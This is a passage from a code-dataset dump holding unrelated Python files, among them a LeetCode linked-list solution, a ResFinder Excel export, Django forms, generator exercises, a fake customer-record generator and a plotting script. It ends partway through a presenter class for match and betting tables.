2->1->4->3.\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n return self.loop(head)\n\n @classmethod\n def recursive(cls, head: ListNode) -> ListNode:\n \"\"\"\n 递归更新每两个点的链表形态。\n 时间复杂度:O(N),N 指的是链表的节点数量。\n 空间复杂度:O(N),递归过程使用的堆栈空间。\n \"\"\"\n if not (head and head.next):\n return head\n\n next_node = head.next\n head.next = cls.recursive(head.next.next)\n next_node.next = head\n return next_node\n\n @classmethod\n def loop(cls, head: ListNode) -> ListNode:\n \"\"\"\n 循环遍历\n 单独设置一个前驱节点,方便\n 时间复杂度是O(n),空间复杂度是O(1)\n \"\"\"\n root = ListNode(-1)\n root.next = head\n\n prev = root\n\n while head and head.next:\n first_node = head\n second_node = head.next\n\n prev.next = second_node\n first_node.next = second_node.next\n second_node.next = first_node\n\n head = first_node.next\n prev = first_node\n\n return root.next\n","sub_path":"Week_01/G20200343030545/LeetCode_24_545.py","file_name":"LeetCode_24_545.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"594994156","text":"from distutils.util import strtobool\n\nfrom settings import EXP_TYPES_PATH\n\n__author__ = 'Ahmed G. 
Ali'\n\n\ndef is_microarray(exp_type):\n if not exp_type:\n return True\n f = open(EXP_TYPES_PATH, 'r')\n lines = f.readlines()\n f.close()\n types = {}\n for line in lines:\n tmp = line.strip().split('\\t')\n types[tmp[0].lower()] = [tmp[1], tmp[2]]\n if exp_type.lower() in types.keys():\n return strtobool(types[exp_type.lower()][0])\n return True\n\n\nif __name__ == '__main__':\n t = is_microarray('transcription profiling by high throughput sequencing')\n print(t)\n","sub_path":"checkers.py","file_name":"checkers.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515150584","text":"import xlwt\r\nimport os\r\n\r\nfrom optparse import OptionParser\r\nimport subprocess\r\nimport sys\r\nimport difflib\r\nimport xlsxwriter\r\nimport re\r\nimport math\r\npath=\"D:\\\\Duke\\\\Duke_201904\\\\Resfinder_0.8_0.6_20190426\"\r\npath3=\"D:\\\\Duke\\\\Duke_201904\"\r\n\r\ndef getwork():\r\n files=os.listdir(path)\r\n wb=xlsxwriter.Workbook((path3+\"\\\\\"+'Resfinder_results20190426_640.xlsx'))\r\n ws1 = wb.add_worksheet('Resfinder')\r\n dic_tmp={}\r\n dic_ID={}\r\n results=[]\r\n idlist={}\r\n nb=1\r\n ws1.write (0,0,'ID')\r\n listres=[\"Sulphonamide\",\"MLS - Macrolide, Lincosamide and Streptogramin B\",\"Fusidic Acid\",\"Nitroimidazole\",\"Aminoglycoside\",\"Oxazolidinone\",\"Beta-lactam\",\"Fosfomycin\",\"Rifampicin\",\"Colistin\",\"Tetracycline\",\"Glycopeptide\",\"Phenicol\",\"Trimethoprim\",\"Fluoroquinolone\"]\r\n for g in listres:\r\n dic_ID[g]=nb\r\n ws1.write(0,nb,g)\r\n nb = nb+1\r\n for i in range(len(files)):\r\n workfile = path+\"\\\\\"+files[i]\r\n file=files[i]\r\n file_name=file.split('.')\r\n file_ID=file_name[0].split('_')\r\n i += 1\r\n ws1.write(i,0,str(file_ID[0]))\r\n idlist[file_ID[0]]=i\r\n infile = open(workfile, \"r\").readlines()\r\n number=0\r\n for gl in listres:\r\n dic_tmp[gl]=[]\r\n for m in range(0,len(infile)):\r\n line1=infile[m].strip()\r\n if line1.startswith('Resistance'):\r\n naline=infile[m-1].strip()\r\n if naline==gl:\r\n while not infile[m+1].startswith('\\n'):\r\n idco=infile[m+1].split(\"\\t\")\r\n m += 1\r\n identity=idco[1]\r\n coverage=idco[3]\r\n genelength=idco[2].split(\"/\")[1]\r\n results=[str(idco[0]),str(identity),str(coverage),str(genelength),'|']\r\n dic_tmp[gl].extend(results)\r\n #print(file_ID[0],gl,dic_tmp[gl],\"!!!\",m,idco)\r\n results=[]\r\n \r\n for ider in dic_tmp.keys():\r\n tmp=(' ').join(dic_tmp[ider])\r\n ws1.write(i,dic_ID[ider],tmp)\r\n wb.close()\r\n \r\nif __name__=='__main__':\r\n getwork()\r\n","sub_path":"sequenceAnalysisCode/resfinderwork20190425.py","file_name":"resfinderwork20190425.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"502175086","text":"import urllib.request\nimport json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\n\n\nclass transformLinkedin(dml.Algorithm):\n contributor = 'emmaliu_yuyangl'\n reads = ['emmaliu_gaotian_xli33_yuyangl.linkedin']\n writes = ['emmaliu_gaotian_xli33_yuyangl.userLocation']\n\n @staticmethod\n def execute(trial=False):\n '''Retrieve some data sets (not using the API here for the sake of simplicity).'''\n startTime = datetime.datetime.now()\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('emmaliu_gaotian_xli33_yuyangl', 'emmaliu_gaotian_xli33_yuyangl')\n \n \n # Get linkedin data \n linkedinData = 
repo.emmaliu_gaotian_xli33_yuyangl.linkedin.find()\n        jobs = {}\n        data=[]\n        dataStored=[]\n        countchange=0\n        \n        for data in linkedinData:\n            if data['query'] == \"amman\":\n                name = data['name']\n                location = data['query']\n                job = data['job']\n                #print(job)\n                currentJob = data['currentJob']\n                #print(currentJob)\n                if currentJob == '':\n                    jobchange = False\n                else:\n                    jobchange = True  # fix: jobchange was left unbound when currentJob was non-empty\n                   # print(jobchange)\n                   # jobs[name] = jobchange\n\n                if jobchange == False:\n                    jobs[name] = {'job':job,'currentjob':currentJob,'location':location,'changejob':'yes'}\n                if jobchange != False:\n                    jobs[name] = {'job':job,'currentjob':currentJob,'location':location,'changejob':'no'}\n                \n                if jobs[name]['changejob'] == 'yes':\n                    countchange+=1\n\n        \n        for key,value in jobs.items():\n            # print(key)\n            dataStored.append({'name':key,'job':value['job'],'currentjob':value['currentjob']})\n\n\n        # store results into database\n        repo.dropCollection(\"transLinkedin\")\n        repo.createCollection(\"transLinkedin\")\n\n        for i in dataStored:\n            # print(i)\n            repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].insert(i)\n        repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].metadata({'complete': True})\n        print(repo['emmaliu_gaotian_xli33_yuyangl.userLocation'].metadata())\n\n        repo.logout()\n\n        endTime = datetime.datetime.now()\n\n        return {\"start\": startTime, \"end\": endTime}\n\n    @staticmethod\n    def provenance(doc=prov.model.ProvDocument(), startTime=None, endTime=None):\n        '''\n        Create the provenance document describing everything happening\n        in this script. Each run of the script will generate a new\n        document describing that invocation event.\n        '''\n\n\n        # Set up the database connection.\n        client = dml.pymongo.MongoClient()\n        repo = client.repo\n\n        repo.authenticate('emmaliu_gaotian_xli33_yuyangl', 'emmaliu_gaotian_xli33_yuyangl')\n        doc.add_namespace('alg', 'http://datamechanics.io/algorithm/emmaliu_gaotian_xli33_yuyangl') # The scripts are in # format.\n        doc.add_namespace('dat', 'http://datamechanics.io/data/emmaliu_gaotian_xli33_yuyangl') # The data sets are in # format.\n        doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\n        doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\n        doc.add_namespace('bdp', '')\n\n\n        this_script = doc.agent('alg:emmaliu_gaotian_xli33_yuyangl#transformLinkedin',\n                                {prov.model.PROV_TYPE: prov.model.PROV['SoftwareAgent'], 'ont:Extension': 'py'})\n        resource = doc.entity('bdp:linkedinapi',\n                              {'prov:label': '311, Service Requests', prov.model.PROV_TYPE: 'ont:DataResource',\n                               'ont:Extension': 'json'})\n\n        transform_Linkedin = doc.activity('log:uuid' + str(uuid.uuid4()), startTime, endTime)\n        doc.wasAssociatedWith(transform_Linkedin, this_script)\n        doc.usage(transform_Linkedin, resource, startTime, None,\n                  {prov.model.PROV_TYPE: 'ont:Retrieval',\n                   'ont:Query': '?type=Animal+Found&$select=type,latitude,longitude,OPEN_DT'\n                   }\n                  )\n\n\n        Linkedin = doc.entity('dat:emmaliu_gaotian_xli33_yuyangl#get_linkedin',\n                              {prov.model.PROV_LABEL: 'linkedin', prov.model.PROV_TYPE: 'ont:DataSet'})\n        doc.wasAttributedTo(Linkedin, this_script)\n        doc.wasGeneratedBy(Linkedin, transform_Linkedin, endTime)\n        doc.wasDerivedFrom(Linkedin, resource, transform_Linkedin, transform_Linkedin, transform_Linkedin)\n\n        repo.logout()\n\n        return doc\n\n# transformLinkedin.execute()\n# doc = getTweets.provenance()\n# 
print(doc.get_provn())\n","sub_path":"emmaliu_gaotian_xli33_yuyangl/transformLinkedin.py","file_name":"transformLinkedin.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"149751728","text":"from utils.getter import gen_couchdb_id\nfrom random import randint, choice\nfrom datetime import datetime, timedelta\nimport string\nfrom functools import reduce\n\n__male_names = [\"Александр\", \"Алексей\", \"Андрей\",\n \"Антон\", \"Артём\", \"Афанасий\",\n \"Борис\", \"Владимир\", \"Георгий\",\n \"Григорий\", \"Даниил\", \"Денис\",\n \"Евгений\", \"Кирилл\", \"Константин\",\n \"Михаил\", \"Николай\", \"Олег\",\n \"Петр\", \"Радеон\", \"Руслан\",\n \"Степан\", \"Тимофей\", \"Федор\"]\n\n__female_names = [\"Александра\", \"Алла\", \"Анна\",\n \"Анастасия\", \"Валентина\", \"Валерия\",\n \"Виктория\", \"Галина\", \"Диана\",\n \"Евгения\", \"Екатерина\", \"Елена\",\n \"Жанна\", \"Зинаида\", \"Зоя\",\n \"Инна\", \"Ирина\", \"Ксения\",\n \"Людмила\", \"Мария\", \"Надежда\",\n \"Наталия\", \"Ольга\", \"Светлана\",\n \"Юлия\", \"Яна\"]\n\n__surnames = ['Архипов', 'Афанасьев', 'Баранов', 'Белов', 'Белозёров',\n 'Блинов', 'Блохин', 'Бобров', 'Бобылёв', 'Богданов',\n 'Власов', 'Волков', 'Воробьёв', 'Воронов', 'Воронцов',\n 'Громов', 'Гуляев', 'Гурьев', 'Гусев', 'Гущин',\n 'Доронин', 'Дорофеев', 'Дроздов', 'Дьячков', 'Евдокимов',\n 'Ершов', 'Ефимов', 'Ефремов', 'Жданов', 'Жуков',\n 'Казаков', 'Калашников', 'Калинин', 'Капустин', 'Карпов',\n 'Кузьмин', 'Кулагин', 'Кулаков', 'Куликов', 'Лаврентьев',\n 'Лобанов', 'Логинов', 'Лукин', 'Лыткин', 'Макаров',\n 'Морозов', 'Муравьёв', 'Мухин', 'Мышкин', 'Мясников',\n 'Никифоров', 'Николаев', 'Никонов', 'Новиков', 'Носков',\n 'Носов', 'Овчинников', 'Одинцов', 'Орехов', 'Орлов',\n 'Осипов', 'Павлов', 'Панов', 'Панфилов', 'Пахомов',\n 'Попов', 'Потапов', 'Прохоров', 'Рогов', 'Родионов',\n 'Рожков', 'Романов', 'Русаков', 'Рыбаков', 'Рябов',\n 'Сафонов', 'Селезнёв', 'Селиверстов', 'Семёнов', 'Сергеев',\n 'Сидоров', 'Силин', 'Симонов', 'Ситников', 'Соболев',\n 'Терентьев', 'Тетерин', 'Тимофеев', 'Титов', 'Тихонов',\n 'Филиппов', 'Фокин', 'Фомин', 'Фомичёв', 'Фролов',\n 'Харитонов', 'Хохлов', 'Цветков', 'Чернов', 'Шарапов',\n 'Шубин', 'Щербаков', 'Щукин', 'Юдин', 'Яковлев', 'Якушев']\n\n\ndef set_last_name(name, sex):\n if sex:\n sex = 'ич'\n else:\n sex = 'на'\n\n if name[-2:] == 'ей':\n last_name = name[:-1] + 'ев' + sex\n elif name[-2:] == 'ий':\n last_name = name[:-2] + 'ьев' + sex\n else:\n last_name = name + 'ов' + sex\n\n return last_name\n\n\ndef random_date(start, end):\n return start + timedelta(\n seconds=randint(0, int((end - start).total_seconds())))\n\n\ndef generate_customer_put():\n sex = bool(randint(0, 1))\n if sex:\n # male\n name = choice(__male_names)\n surname = choice(__surnames)\n last_name = set_last_name(choice(__male_names), sex)\n sex = 'male'\n else:\n # female\n name = choice(__female_names)\n surname = choice(__surnames) + 'а'\n last_name = set_last_name(choice(__male_names), sex)\n sex = 'female'\n\n date = random_date(datetime(year=1960, month=1, day=1), datetime(year=2000, month=12, day=31))\n date = datetime.strftime(date, \"%Y-%m-%dT%H:%M:%SZ\")\n\n contact_methods = [{\n 'type': \"phoneNumber\",\n 'value': reduce(lambda a, b: a + choice(string.digits), string.digits, \"\")\n }]\n\n tokens = [{\n 'key': str(randint(1000, 9999)),\n 'type': \"card\",\n 'entry': \"trackCode\"\n }]\n\n customer_id = gen_couchdb_id('customer_put')\n\n customer_put 
= {\n '_id': customer_id,\n 'purged': True,\n # Используется для фильтрации, но в тестах пока не используется\n # 'tablesSchemeDocId': table_scheme,\n 'customerGuid': customer_id,\n 'firstName': name,\n 'middleName': last_name,\n 'lastName': surname,\n 'sex': sex,\n 'dateOfBirth': date,\n 'contactMethods': contact_methods,\n 'comment': \"Типичный клиентик. (Данный комментарий можно заменить на случайно сгенерированное сообщение)\",\n 'tokens': tokens\n }\n\n return customer_put\n","sub_path":"utils/generate/generate_customer.py","file_name":"generate_customer.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"438296047","text":"# DAY THREE HANDS ON ASSIGNMENT\n\n'''\n 1. Create fib series using generators\n'''\n\ndef fib(n):\n a, b, count = 0, 1, 0\n while True:\n if count > n:\n return\n yield a\n a, b = b, a + b\n count += 1\n\nf = fib(10)\nfor x in f:\n print(list(f))\n\n\n\n'''\n 2. Display prime numbers from n1 to n2 using iterators and generators\n'''\n\nclass Primos:\n\n def __init__(self, n1, n2):\n self.n1 = n1\n self.n2 = n2\n\n def __iter__(self):\n return self\n\n def __next__(self):\n val = self.n1\n\n if self.n1 > self.n2:\n raise StopIteration\n\n self.n1 += 1\n\n for x in range(2, val):\n if val % x == 0:\n break\n else:\n return val\n\np = Primos(1, 10)\n\nlist_primes= [v for v in p if v is not None]\nprint(list_primes)\n\n\n\n'''Generator method to get prime numbers from 30 to 200'''\n\ndef is_prime(n):\n for i in range(2, int((n ** 0.5)) + 1):\n if n % i == 0:\n return False\n return True\n\ndef getPrimes(n1, n2):\n while n1 < n2:\n if is_prime(n1):\n yield n1\n n1 += 1\n\nl = list(getPrimes(30, 200))\n\nprint(l)\n\n\n\n'''\n 3. Write a generator which computes the running average for any given list\n input = [7, 13, 17, 231, 12, 8, 3]\n output = [7.00, 10.00, 12.33, 67.00, 56.00, 48.00, 41.57]\n'''\n\ndef compute_running_avg():\n total, count, avg = 0.0, 0, None\n\n while True:\n temp = yield avg\n total += temp\n count += 1\n avg = total / count\n\n\nrunning_avg = compute_running_avg()\nnext(running_avg)\na_list = [7, 13, 17, 231, 12, 8, 3]\n\nfor v in a_list:\n result = \"sent: {val:3d}, new average: {avg:6.2f}\"\n print(result.format(val=v, avg=running_avg.send(v)))\n\n","sub_path":"exo7.py","file_name":"exo7.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"264423265","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom .models import Tag, Post\n\n\nclass TagForm(forms.ModelForm): #(forms.Form):\n #title = forms.CharField(max_length=50)\n #slug = forms.CharField(max_length=150)\n\n #title.widget.attrs.update({ 'class': 'form-control' })\n #slug.widget.attrs.update({ 'class': 'form-control' })\n class Meta:\n model = Tag\n fields = ['title','slug']\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'slug': forms.TextInput(attrs={'class': 'form-control'})\n }\n\n\n\n def clean_slug(self):\n new_slug = self.cleaned_data['slug'].lower() # self.cleaned_data.get('slug')\n #фильтрация слов которые нельза импортировать в бд - систнемные слова\n #например слово пути маршрута 'create'\n if new_slug == 'create':\n raise ValidationError('Slug may not be \"Create\"')\n #проверим слаг на наличие в словаре хранимых слов зарегистрированных\n #если count > 0 то возвращается true если count == 0 то false\n if 
Tag.objects.filter(slug__iexact=new_slug).count():\n raise ValidationError('Slug must be unique. We have \"{}\" slug already'.format(new_slug))\n\n return new_slug\n\n\n #переопределим метод save()\n #при наследовании от forms.ModelForm этот метод нельзя переопределить,\n #так как у него есть свой универсальный метод save()\n #def save(self):\n # new_tag=Tag.objects.create(title=self.cleaned_data['title'],\n # slug=self.cleaned_data['slug']\n # )\n # return new_tag\n\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n\n fields = ['title','slug', 'body', 'tags']\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'slug': forms.TextInput(attrs={'class': 'form-control'}),\n 'body': forms.Textarea(attrs={'class': 'form-control'}),\n 'tags': forms.SelectMultiple(attrs={'class': 'form-control'})\n \n }\n\n def clean_slug(self):\n new_slug = self.cleaned_data['slug'].lower() # self.cleaned_data.get('slug')\n #фильтрация слов которые нельза импортировать в бд - систнемные слова\n #например слово пути маршрута 'create'\n if new_slug == 'create':\n raise ValidationError('Slug may not be \"Create\"')\n #здесь не делаем проверку на уникальность, так\n #так как позже сделаем чтобы слаг генерировался \n #уникальным автоматически\n #if Tag.objects.filter(slug__iexact=new_slug).count():\n # raise ValidationError('Slug must be unique. We have \"{}\" slug already'.format(new_slug))\n return new_slug\n\n","sub_path":"app/blogengine/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"507949384","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nlog_dir_main = '../logs/final_combined_toy_example_invertibleTP_save/'\nlog_dir_save = '../logs/final_combined_toy_example_unequal_layers_save/'\nmax_epoch = 60\n\nindices = [0,1,2,4,5,6,7,8,9,10,11,12,13,14]\n\n# ====== load results =======\ntrain_losses_TP = np.load(log_dir_main + 'train_losses_TP.npy')\ntest_losses_TP = np.load(log_dir_main + 'test_losses_TP.npy')\napprox_error_angles_array_TP=np.load(log_dir_main + 'approx_error_angles_array_TP.npy')\napprox_errors_array_TP=np.load(log_dir_main + 'approx_errors_array_TP.npy')\n\ntrain_losses_TPrandom=np.load(log_dir_main + 'train_losses_TPrandom.npy')\ntest_losses_TPrandom=np.load(log_dir_main + 'test_losses_TPrandom.npy')\napprox_error_angles_array_TPrandom=np.load(log_dir_main + 'approx_error_angles_array_TPrandom.npy')\napprox_errors_array_TPrandom=np.load(log_dir_main + 'approx_errors_array_TPrandom.npy')\n\ntrain_losses_MTP=np.load(log_dir_main + 'train_losses_MTP.npy')\ntest_losses_MTP=np.load(log_dir_main + 'test_losses_MTP.npy')\napprox_error_angles_array_MTP=np.load(log_dir_main + 'approx_error_angles_array_MTP.npy')\napprox_errors_array_MTP=np.load(log_dir_main + 'approx_errors_array_MTP.npy')\n\ntrain_losses_BP=np.load(log_dir_main + 'train_losses_BP.npy')\ntest_losses_BP=np.load(log_dir_main + 'test_losses_BP.npy')\n\ntrain_losses_BP_fixed=np.load(log_dir_main + 'train_losses_BP_fixed.npy')\ntest_losses_BP_fixed=np.load(log_dir_main + 'test_losses_BP_fixed.npy')\n\n# train_losses_TP = train_losses_TP[indices,:]\n# test_losses_TP=test_losses_TP[indices,:]\n# approx_error_angles_array_TP=approx_error_angles_array_TP[indices,:]\n# approx_errors_array_TP=approx_errors_array_TP[indices,:]\n#\n# train_losses_TPrandom=train_losses_TPrandom[indices,:]\n# test_losses_TPrandom=test_losses_TPrandom[indices,:]\n# 
approx_error_angles_array_TPrandom=approx_error_angles_array_TPrandom[indices,:]\n# approx_errors_array_TPrandom=approx_errors_array_TPrandom[indices,:]\n#\n# train_losses_MTP=train_losses_MTP[indices,:]\n# test_losses_MTP=test_losses_MTP[indices,:]\n# approx_error_angles_array_MTP=approx_error_angles_array_MTP[indices,:]\n# approx_errors_array_MTP=approx_errors_array_MTP[indices,:]\n#\n# train_losses_BP=train_losses_BP[indices,:]\n# test_losses_BP=test_losses_BP[indices,:]\n#\n# train_losses_BP_fixed=train_losses_BP_fixed[indices,:]\n# test_losses_BP_fixed=test_losses_BP_fixed[indices,:]\n\n\n# # ====== Save results =======\n# np.save(log_dir_save + 'train_losses_TP.npy', train_losses_TP)\n# np.save(log_dir_save + 'test_losses_TP.npy', test_losses_TP)\n# np.save(log_dir_save + 'approx_error_angles_array_TP.npy', approx_error_angles_array_TP)\n# np.save(log_dir_save + 'approx_errors_array_TP.npy', approx_errors_array_TP)\n#\n# np.save(log_dir_save + 'train_losses_TPrandom.npy', train_losses_TPrandom)\n# np.save(log_dir_save + 'test_losses_TPrandom.npy', test_losses_TPrandom)\n# np.save(log_dir_save + 'approx_error_angles_array_TPrandom.npy', approx_error_angles_array_TPrandom)\n# np.save(log_dir_save + 'approx_errors_array_TPrandom.npy', approx_errors_array_TPrandom)\n#\n# np.save(log_dir_save + 'train_losses_MTP.npy', train_losses_MTP)\n# np.save(log_dir_save + 'test_losses_MTP.npy', test_losses_MTP)\n# np.save(log_dir_save + 'approx_error_angles_array_MTP.npy', approx_error_angles_array_MTP)\n# np.save(log_dir_save + 'approx_errors_array_MTP.npy', approx_errors_array_MTP)\n#\n# np.save(log_dir_save + 'train_losses_BP.npy', train_losses_BP)\n# np.save(log_dir_save + 'test_losses_BP.npy', test_losses_BP)\n#\n# np.save(log_dir_save + 'train_losses_BP_fixed.npy', train_losses_BP_fixed)\n# np.save(log_dir_save + 'test_losses_BP_fixed.npy', test_losses_BP_fixed)\n\n# ========= Average results ==========\ntrain_loss_TP_mean = np.mean(train_losses_TP, axis=0)\ntest_loss_TP_mean = np.mean(test_losses_TP, axis=0)\napprox_errors_TP_mean = np.mean(approx_errors_array_TP, axis=0)\napprox_error_angle_TP_mean = np.mean(approx_error_angles_array_TP, axis=0)\n\ntrain_loss_TPrandom_mean = np.mean(train_losses_TPrandom, axis=0)\ntest_loss_TPrandom_mean = np.mean(test_losses_TPrandom, axis=0)\napprox_errors_TPrandom_mean = np.mean(approx_errors_array_TPrandom, axis=0)\napprox_error_angle_TPrandom_mean = np.mean(approx_error_angles_array_TPrandom, axis=0)\n\ntrain_loss_MTP_mean = np.mean(train_losses_MTP, axis=0)\ntest_loss_MTP_mean = np.mean(test_losses_MTP, axis=0)\napprox_errors_MTP_mean = np.mean(approx_errors_array_MTP, axis=0)\napprox_error_angle_MTP_mean = np.mean(approx_error_angles_array_MTP, axis=0)\n\ntrain_loss_BP_mean = np.mean(train_losses_BP, axis=0)\ntest_loss_BP_mean = np.mean(test_losses_BP, axis=0)\n\ntrain_loss_fixed_BP_mean = np.mean(train_losses_BP_fixed, axis=0)\ntest_loss_fixed_BP_mean = np.mean(test_losses_BP_fixed, axis=0)\n\n\n# ========== Smooth results =========\ndef smooth(y, box_pts=8):\n    box = np.ones(box_pts)/box_pts\n    y_smooth = np.convolve(y, box, mode='valid')\n    return y_smooth\n\napprox_errors_MTP_mean = smooth(approx_errors_MTP_mean)\napprox_error_angle_MTP_mean = smooth(approx_error_angle_MTP_mean)\napprox_errors_TP_mean = smooth(approx_errors_TP_mean)\napprox_error_angle_TP_mean = smooth(approx_error_angle_TP_mean)\napprox_errors_TPrandom_mean = smooth(approx_errors_TPrandom_mean)\napprox_error_angle_TPrandom_mean = smooth(approx_error_angle_TPrandom_mean)\n\n\n\n# 
========= PLOTS ===========\nfontsize = 14\nepochs = np.arange(0, max_epoch+1)\nlegend1 = ['TP-EI', 'RTP-EI', 'RMTP-EI', 'BP', 'BP-fixed']\nlegend2 = ['TP-EI', 'RTP-EI', 'RMTP-EI']\n# Set plot style\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\nfig = plt.figure('training_loss')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(epochs, train_loss_TP_mean)\nplt.semilogy(epochs, train_loss_TPrandom_mean)\nplt.semilogy(epochs, train_loss_MTP_mean)\nplt.semilogy(epochs, train_loss_BP_mean)\nplt.semilogy(epochs, train_loss_fixed_BP_mean)\nplt.xlabel(r'epoch', fontsize=fontsize)\nplt.ylabel(r'MSE loss', fontsize=fontsize)\nplt.legend(legend1, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('test_loss')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(epochs, test_loss_TP_mean)\nplt.semilogy(epochs, test_loss_TPrandom_mean)\nplt.semilogy(epochs, test_loss_MTP_mean)\nplt.semilogy(epochs, test_loss_BP_mean)\nplt.semilogy(epochs, test_loss_fixed_BP_mean)\nplt.xlabel(r'epoch', fontsize=fontsize)\nplt.ylabel(r'MSE loss', fontsize=fontsize)\nplt.legend(legend1, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('approx_error_angles')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.plot(approx_error_angle_TP_mean)\nplt.plot(approx_error_angle_TPrandom_mean)\nplt.plot(approx_error_angle_MTP_mean)\nplt.xlabel(r'mini-batch', fontsize=fontsize)\nplt.ylabel(r'$\\cos(\\alpha)$', fontsize=fontsize)\nplt.legend(legend2, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('approx_errors')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(approx_errors_TP_mean)\nplt.semilogy(approx_errors_TPrandom_mean)\nplt.semilogy(approx_errors_MTP_mean)\nplt.xlabel(r'mini-batch', fontsize=fontsize)\nplt.ylabel(r'$\\|e^{approx}\\|_2$', fontsize=fontsize)\nplt.legend(legend2, fontsize=fontsize, loc='upper right')\nplt.show()\n","sub_path":"utils/plot_combined_toyexample.py","file_name":"plot_combined_toyexample.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"417259435","text":"\nclass Presenter:\n def __init__(self, model):\n self.model = model\n\n self.matches_columns = ['Дата', 'Турнир', 'Игрок1', 'Игрок2', 'Счет', 'Источники', 'БК', 'Хеш']\n self.matches_dtypes = ['string'] * 8\n\n self.competitions_columns = ['Дата', 'Название', 'Игроки', 'Матчи', 'Источники']\n self.competitions_dtypes = ['string'] * 2 + ['number'] * 2 + ['string']\n\n self.bets_columns = ['Дата', 'Турнир', 'id1', 'id2', 'Счет', 'К1', 'К2', 'Тотал', 'Б', 'М']\n self.bets_dtypes = ['string'] * 10\n\n self.players_columns = ['id', 'Игрок', 'LP', 'Матчи']\n self.players_dtypes = ['string'] * 3 + ['number']\n\n self.player_rankings_columns = ['Дата', 'Источник', 'Рейтинг', 'Ранг']\n self.player_rankings_dtypes = ['string'] * 2 + ['number'] * 2\n\n self.rankings_columns = ['#', 'id', 'Игрок'] + [e[0] for e in self.model.rankingSources]\n self.rankings_dtypes = ['number'] + ['string'] * 2 + ['number'] * len(self.model.rankingSources)\n\n\n def getHref(self, playerId, playerName, filterFlag=False):\n if (playerId is not None) and playerId != '':\n hr = '' + str(playerName) + ''\n if filterFlag:\n return '' + hr\n else:\n return hr\n return str(playerName)\n\n def getCompHref0(self, id, name):\n return '' + name + 
''\n\n    def getCompHref(self, compId, name):\n        if compId is not None:\n            return '' + \\\n                   '' + \\\n                   '' + name + ''\n        return name\n\n    def getSourceHref(self, name):\n#        return '' + '' + \\\n#               '' + name + ''\n        return '' + \\\n               '' + name\n\n    def getPlayersHrefsByIds(self, ids, filterFlag=False):\n        return ' - '.join([self.getHref(e, self.model.playersDict.getName(e, fl=1), filterFlag=filterFlag) for e in ids])\n\n    def getPlayersHrefsByIdsNames(self, ids, names, filterFlag=False):\n        arr = []\n        for e1, e2 in zip(ids, names):\n            name = self.model.playersDict.getName(e1, fl=1)\n            playerId = e1\n            if name is None:\n                name = e2\n                playerId = None\n            arr.append(self.getHref(playerId, name, filterFlag=filterFlag))\n        return ' - '.join(arr)\n\n    def getPlayersIdsHrefs(self, players, ids, filterFlag=False):\n        arr = []\n        for playerName, playerId in zip(players, ids):\n            if playerId == '' or playerId.find(',') != -1:\n                arr.append(playerName)\n            else:\n                arr.append(self.getHref(playerId, playerName))\n        return ' - '.join(arr)\n\n    def getLiveBetsTable(self):\n        data = []\n        for key, matchBet in sorted(self.model.betsStorage.liveBets.items(), key=lambda x: x[1].dt, reverse=1):\n            names1 = self.getPlayersIdsHrefs(matchBet.names[0], matchBet.ids[0])\n            names2 = self.getPlayersIdsHrefs(matchBet.names[1], matchBet.ids[1])\n            info = '
